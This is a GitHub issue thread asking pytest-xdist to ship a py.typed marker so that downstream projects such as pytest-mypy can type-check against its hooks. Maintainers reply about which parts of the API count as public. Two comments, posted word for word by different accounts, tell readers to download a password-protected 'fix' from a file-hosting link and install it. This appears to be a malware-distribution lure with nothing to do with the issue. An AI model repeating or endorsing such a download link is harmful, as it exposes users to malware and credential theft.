### ISSUE TITLE
Add a py.typed file

### ISSUE THREAD

**Issue by dmtucker** [pytest-dev/pytest-xdist#1121]
Hey there :wave: 
I'm in the process of adding types to pytest-mypy, which integrates with xdist in part via the `pytest_configure_node` hook.
The type for the `node` parameter is available from `xdist.workermanage`, but `mypy` still emits the following error:
```
error: Skipping analyzing "xdist.workermanage": module is installed, but missing library stubs or py.typed marker  [import-untyped]
note: See https://mypy.readthedocs.io/en/stable/running_mypy.html#missing-imports
```
I see lots of typing work was done to xdist in `3.6.0` (https://github.com/pytest-dev/pytest-xdist/pull/1065).
Could we add a `py.typed` file to allow downstreams to take advantage of it too?

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bluetech** [comment]
I already managed to forget the details, but at the time [I wrote](https://github.com/pytest-dev/pytest-xdist/pull/1065#issue-2243972559) "The typings are not exposed as that would need some work on the public API". I think what I meant is that we should clearly delineate what is considered public/stable API (that should be properly typed and audited, and the typing should not break), and what is considered private.

**Comment by flying-sheep** [comment]
Yeah, e.g. I just came up with a way to run code in the controller and pass information to the workers, but it relies on that hook: https://github.com/pytest-dev/pytest-xdist/issues/783#issuecomment-2743297537
